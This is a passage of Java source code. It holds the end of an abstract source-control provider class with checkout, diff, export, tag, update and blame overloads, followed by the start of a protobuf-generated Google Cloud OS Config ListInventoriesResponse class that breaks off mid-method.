            ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException {
        throw new NoSuchCommandScmException("checkin");
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException {
        return checkOut(repository, fileSet, tag, true);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, String tag, boolean recursive)
            throws ScmException {
        ScmVersion scmVersion = null;

        if (tag != null && !tag.isEmpty()) {
            scmVersion = new ScmBranch(tag);
        }

        return checkOut(repository, fileSet, scmVersion, recursive);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        return checkOut(repository, fileSet, (ScmVersion) null, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion)
            throws ScmException {
        return checkOut(repository, fileSet, scmVersion, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckOutScmResult checkOut(ScmRepository repository, ScmFileSet fileSet, boolean recursive)
            throws ScmException {
        return checkOut(repository, fileSet, (ScmVersion) null, recursive);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public CheckOutScmResult checkOut(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, boolean recursive)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);

        parameters.setString(CommandParameter.RECURSIVE, Boolean.toString(recursive));

        return checkout(repository.getProviderRepository(), fileSet, parameters);
    }

    @Override
    public CheckOutScmResult checkOut(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, CommandParameters commandParameters)
            throws ScmException {
        login(repository, fileSet);

        // Only seed the version parameter when the caller has not already supplied one.
        if (scmVersion != null && commandParameters.getScmVersion(CommandParameter.SCM_VERSION, null) == null) {
            commandParameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);
        }

        return checkout(repository.getProviderRepository(), fileSet, commandParameters);
    }

    /**
     * Hook for the {@code checkout} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected CheckOutScmResult checkout(
            ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException {
        throw new NoSuchCommandScmException("checkout");
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public DiffScmResult diff(ScmRepository repository, ScmFileSet fileSet, String startRevision, String endRevision)
            throws ScmException {
        ScmVersion startVersion = null;
        ScmVersion endVersion = null;

        if (startRevision != null && !startRevision.isEmpty()) {
            startVersion = new ScmRevision(startRevision);
        }

        if (endRevision != null && !endRevision.isEmpty()) {
            endVersion = new ScmRevision(endRevision);
        }

        return diff(repository, fileSet, startVersion, endVersion);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public DiffScmResult diff(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion startVersion, ScmVersion endVersion)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.START_SCM_VERSION, startVersion);

        parameters.setScmVersion(CommandParameter.END_SCM_VERSION, endVersion);

        return diff(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code diff} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected DiffScmResult diff(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("diff");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public EditScmResult edit(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        return edit(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code edit} command; logs a warning and reports success (no-op) unless overridden.
     */
    protected EditScmResult edit(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        if (logger.isWarnEnabled()) {
            logger.warn("Provider " + this.getScmType() + " does not support edit operation.");
        }

        return new EditScmResult("", null, null, true);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException {
        return export(repository, fileSet, tag, null);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, String tag, String outputDirectory)
            throws ScmException {
        ScmVersion scmVersion = null;

        if (tag != null && !tag.isEmpty()) {
            scmVersion = new ScmRevision(tag);
        }

        return export(repository, fileSet, scmVersion, outputDirectory);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        return export(repository, fileSet, (ScmVersion) null, null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion)
            throws ScmException {
        return export(repository, fileSet, scmVersion, null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ExportScmResult export(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String outputDirectory)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);

        parameters.setString(CommandParameter.OUTPUT_DIRECTORY, outputDirectory);

        return export(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code export} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected ExportScmResult export(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("export");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ListScmResult list(ScmRepository repository, ScmFileSet fileSet, boolean recursive, String tag)
            throws ScmException {
        ScmVersion scmVersion = null;

        if (tag != null && !tag.isEmpty()) {
            scmVersion = new ScmRevision(tag);
        }

        return list(repository, fileSet, recursive, scmVersion);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ListScmResult list(ScmRepository repository, ScmFileSet fileSet, boolean recursive, ScmVersion scmVersion)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.RECURSIVE, Boolean.toString(recursive));

        if (scmVersion != null) {
            parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);
        }

        return list(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * List each element (files and directories) of <B>fileSet</B> as they exist in the repository.
     *
     * @param repository the source control system
     * @param fileSet the files to list
     * @param parameters the command parameters (recursion flag, optional version)
     * @return the list of files in the repository
     * @throws NoSuchCommandScmException unless overridden by subclass
     * @throws ScmException if any
     */
    protected ListScmResult list(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("list");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public MkdirScmResult mkdir(ScmRepository repository, ScmFileSet fileSet, String message, boolean createInLocal)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        if (message == null) {
            message = "";
            // An empty commit message only matters when the directory is created remotely.
            if (!createInLocal) {
                logger.warn("Commit message is empty!");
            }
        }

        parameters.setString(CommandParameter.MESSAGE, message);

        parameters.setString(CommandParameter.SCM_MKDIR_CREATE_IN_LOCAL, Boolean.toString(createInLocal));

        return mkdir(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Create directory/directories in the repository.
     *
     * @param repository the source control system
     * @param fileSet the directories to create
     * @param parameters the command parameters (message, create-in-local flag)
     * @return the result of the mkdir command
     * @throws ScmException if any
     */
    protected MkdirScmResult mkdir(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("mkdir");
    }

    /**
     * Logs in against the repository and fails fast when the login is rejected.
     */
    private void login(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        LoginScmResult result = login(repository.getProviderRepository(), fileSet, new CommandParameters());

        if (!result.isSuccess()) {
            throw new ScmException("Can't login.\n" + result.getCommandOutput());
        }
    }

    /**
     * Hook for the {@code login} command; succeeds unconditionally unless overridden.
     */
    protected LoginScmResult login(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        return new LoginScmResult(null, null, null, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public RemoveScmResult remove(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.MESSAGE, message == null ? "" : message);

        return remove(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code remove} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected RemoveScmResult remove(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("remove");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public StatusScmResult status(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        return status(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code status} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected StatusScmResult status(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("status");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public TagScmResult tag(ScmRepository repository, ScmFileSet fileSet, String tagName) throws ScmException {
        return tag(repository, fileSet, tagName, new ScmTagParameters());
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public TagScmResult tag(ScmRepository repository, ScmFileSet fileSet, String tagName, String message)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.TAG_NAME, tagName);

        if (message != null && !message.isEmpty()) {
            parameters.setString(CommandParameter.MESSAGE, message);
        }

        ScmTagParameters scmTagParameters = new ScmTagParameters(message);

        parameters.setScmTagParameters(CommandParameter.SCM_TAG_PARAMETERS, scmTagParameters);

        return tag(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public TagScmResult tag(
            ScmRepository repository, ScmFileSet fileSet, String tagName, ScmTagParameters scmTagParameters)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.TAG_NAME, tagName);

        parameters.setScmTagParameters(CommandParameter.SCM_TAG_PARAMETERS, scmTagParameters);

        return tag(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code tag} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected TagScmResult tag(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("tag");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UnEditScmResult unedit(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        return unedit(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code unedit} command; logs a warning and reports success (no-op) unless overridden.
     */
    protected UnEditScmResult unedit(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        if (logger.isWarnEnabled()) {
            logger.warn("Provider " + this.getScmType() + " does not support unedit operation.");
        }

        return new UnEditScmResult("", null, null, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UntagScmResult untag(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        logger.warn("Provider " + this.getScmType() + " does not support untag operation.");
        return new UntagScmResult("", null, null, true);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException {
        return update(repository, fileSet, tag, true);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, boolean runChangelog)
            throws ScmException {
        return update(repository, fileSet, tag, "", runChangelog);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet) throws ScmException {
        return update(repository, fileSet, (ScmVersion) null, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion)
            throws ScmException {
        return update(repository, fileSet, scmVersion, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, boolean runChangelog)
            throws ScmException {
        return update(repository, fileSet, (ScmVersion) null, "", runChangelog);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, boolean runChangelog)
            throws ScmException {
        return update(repository, fileSet, scmVersion, "", runChangelog);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, String datePattern)
            throws ScmException {
        return update(repository, fileSet, tag, datePattern, true);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String datePattern)
            throws ScmException {
        return update(repository, fileSet, scmVersion, datePattern, true);
    }

    /**
     * @deprecated
     */
    @Deprecated
    private UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, String tag, String datePattern, boolean runChangelog)
            throws ScmException {
        ScmBranch scmBranch = null;

        if (tag != null && !tag.isEmpty()) {
            scmBranch = new ScmBranch(tag);
        }

        return update(repository, fileSet, scmBranch, datePattern, runChangelog);
    }

    private UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String datePattern,
            boolean runChangelog)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);

        parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern);

        parameters.setString(CommandParameter.RUN_CHANGELOG_WITH_UPDATE, String.valueOf(runChangelog));

        return update(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, Date lastUpdate)
            throws ScmException {
        return update(repository, fileSet, tag, lastUpdate, null);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, Date lastUpdate)
            throws ScmException {
        return update(repository, fileSet, scmVersion, lastUpdate, null);
    }

    /**
     * {@inheritDoc}
     *
     * @deprecated
     */
    @Deprecated
    @Override
    public UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, String tag, Date lastUpdate, String datePattern)
            throws ScmException {
        ScmBranch scmBranch = null;

        if (tag != null && !tag.isEmpty()) {
            scmBranch = new ScmBranch(tag);
        }

        return update(repository, fileSet, scmBranch, lastUpdate, datePattern);
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public UpdateScmResult update(
            ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, Date lastUpdate, String datePattern)
            throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion);

        if (lastUpdate != null) {
            parameters.setDate(CommandParameter.START_DATE, lastUpdate);
        }

        parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern);

        parameters.setString(CommandParameter.RUN_CHANGELOG_WITH_UPDATE, "true");

        return update(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code update} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected UpdateScmResult update(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("update");
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public BlameScmResult blame(ScmRepository repository, ScmFileSet fileSet, String filename) throws ScmException {
        login(repository, fileSet);

        CommandParameters parameters = new CommandParameters();

        parameters.setString(CommandParameter.FILE, filename);

        return blame(repository.getProviderRepository(), fileSet, parameters);
    }

    /**
     * Hook for the {@code blame} command; throws {@link NoSuchCommandScmException} unless overridden.
     */
    protected BlameScmResult blame(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        throw new NoSuchCommandScmException("blame");
    }

    @Override
    public BlameScmResult blame(BlameScmRequest blameScmRequest) throws ScmException {
        return blame(
                blameScmRequest.getScmRepository().getProviderRepository(),
                blameScmRequest.getScmFileSet(),
                blameScmRequest.getCommandParameters());
    }

    @Override
    public InfoScmResult info(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters)
            throws ScmException {
        // Providers that support "info" override this; null signals "not supported".
        return null;
    }

    @Override
    public RemoteInfoScmResult remoteInfo(
            ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException {
        // Providers that support "remoteinfo" override this; null signals "not supported".
        return null;
    }

    /**
     * {@inheritDoc}
     */
    @Override
    public ScmProviderRepository makeProviderScmRepository(File path)
            throws ScmRepositoryException, UnknownRepositoryStructure {
        throw new UnknownRepositoryStructure();
    }
}
googleapis/google-cloud-java
35,776
java-os-config/proto-google-cloud-os-config-v1/src/main/java/com/google/cloud/osconfig/v1/ListInventoriesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/osconfig/v1/inventory.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.osconfig.v1; /** * * * <pre> * A response message for listing inventory data for all VMs in a specified * location. * </pre> * * Protobuf type {@code google.cloud.osconfig.v1.ListInventoriesResponse} */ public final class ListInventoriesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.osconfig.v1.ListInventoriesResponse) ListInventoriesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListInventoriesResponse.newBuilder() to construct. 
private ListInventoriesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListInventoriesResponse() { inventories_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListInventoriesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.osconfig.v1.ListInventoriesResponse.class, com.google.cloud.osconfig.v1.ListInventoriesResponse.Builder.class); } public static final int INVENTORIES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.osconfig.v1.Inventory> inventories_; /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.osconfig.v1.Inventory> getInventoriesList() { return inventories_; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesOrBuilderList() { return inventories_; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public int getInventoriesCount() { return inventories_.size(); } /** * * * <pre> * List of inventory objects. 
* </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public com.google.cloud.osconfig.v1.Inventory getInventories(int index) { return inventories_.get(index); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public com.google.cloud.osconfig.v1.InventoryOrBuilder getInventoriesOrBuilder(int index) { return inventories_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < inventories_.size(); i++) { output.writeMessage(1, inventories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < inventories_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, inventories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.osconfig.v1.ListInventoriesResponse)) { return super.equals(obj); } com.google.cloud.osconfig.v1.ListInventoriesResponse other = (com.google.cloud.osconfig.v1.ListInventoriesResponse) obj; if (!getInventoriesList().equals(other.getInventoriesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) 
return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getInventoriesCount() > 0) { hash = (37 * hash) + INVENTORIES_FIELD_NUMBER; hash = (53 * hash) + getInventoriesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, 
extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.osconfig.v1.ListInventoriesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder 
toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * A response message for listing inventory data for all VMs in a specified * location. * </pre> * * Protobuf type {@code google.cloud.osconfig.v1.ListInventoriesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.osconfig.v1.ListInventoriesResponse) com.google.cloud.osconfig.v1.ListInventoriesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.osconfig.v1.ListInventoriesResponse.class, com.google.cloud.osconfig.v1.ListInventoriesResponse.Builder.class); } // Construct using com.google.cloud.osconfig.v1.ListInventoriesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (inventoriesBuilder_ == null) { inventories_ = java.util.Collections.emptyList(); } else { inventories_ = null; inventoriesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return 
